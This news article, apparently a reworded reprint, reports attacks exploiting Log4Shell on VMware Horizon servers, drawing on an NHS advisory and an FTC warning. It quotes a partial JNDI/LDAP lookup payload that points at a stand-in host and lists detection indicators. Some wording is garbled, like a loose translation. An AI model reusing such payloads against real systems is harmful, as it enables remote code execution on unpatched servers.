Criminals are actively exploiting the high-severity Log4Shell vulnerability on servers running VMware Horizon with the aim of installing malware that allows them to take full control of affected systems, warns the UK’s public healthcare system.
CVE-2021-44228 is one of the most serious vulnerabilities brought to light in recent years. It resides in Log4J, a library of system logging code used in thousands, if not millions, of third-party apps and websites. This means that there is a huge base of vulnerable systems. Additionally, the vulnerability is extremely easy to exploit and allows attackers to install web shells, which provide a command window to execute highly privileged commands on hacked servers.
The remote code execution flaw in Log4J emerged in December after the exploit code was released before a fix was released. Malicious hackers quickly began to actively exploit CVE-2021-44228 to compromise sensitive systems.
Attacks, including those targeting VMware Horizon, have continued since then.
“An unknown group of threats has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within affected networks, ”officials from the UK’s National Health System wrote. They then provided advice on specific actions that affected organizations can take to mitigate the threat.
The main one is the recommendation to install an update that VMware released for its Horizon product, which gives organizations a way to virtualize desktop and application capabilities using enterprise virtualization technology. NHS officials have also noted signs that vulnerable organizations can look for to identify possible attacks they may have suffered.
The notice comes a day after the Federal Trade Commission warned consumer-oriented companies to fix vulnerable systems to avoid the fate of Equifax. In 2019, the credit reporting agency agreed to pay $ 575 million to settle the FTC’s fees resulting from its failure to fix an equally serious vulnerability in another software known as Apache Struts. When an unknown attacker exploited Equifax’s network vulnerability, it led to the compromise of sensitive data for 143 million people, making it one of the worst data breaches on record.
“The FTC intends to use all of its legal authority to prosecute companies that fail to take reasonable steps to protect consumer data from exposure to Log4j or similar known vulnerabilities in the future,” FTC officials. noted
The NHS is at least the second organization to observe exploits targeting a VMware product. Last month, researchers reported that attackers were targeting systems running VMware VCenter in order to install the Conti ransomware.
Attacks targeting unpatched VMware Horizon servers target its use of an open source service.
“The attack is most likely launched via a Log4Shell payload similar to $ jndi: ldap: //example.com,” the NHS notice said. “The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is integrated with VMware Horizon. This then launches the following PowerShell command, generated from ws_TomcatService.exe: “
After a few more steps, attackers are able to install a web shell that has permanent communication with a server they control. Here is a representation of the attack:
The notice added:
Organizations should look for the following:
- Evidence of ws_TomcatService.exe cause abnormal processes
- Any powershell.exe process containing ‘VMBlastSG’ in command line
- File changes in ‘… VMware VMware View Server appblastgateway lib absg-worker.js’ – This file is usually overwritten during upgrades and is not changed
Praetorian security firm released on Friday this tool to identify vulnerable systems at scale.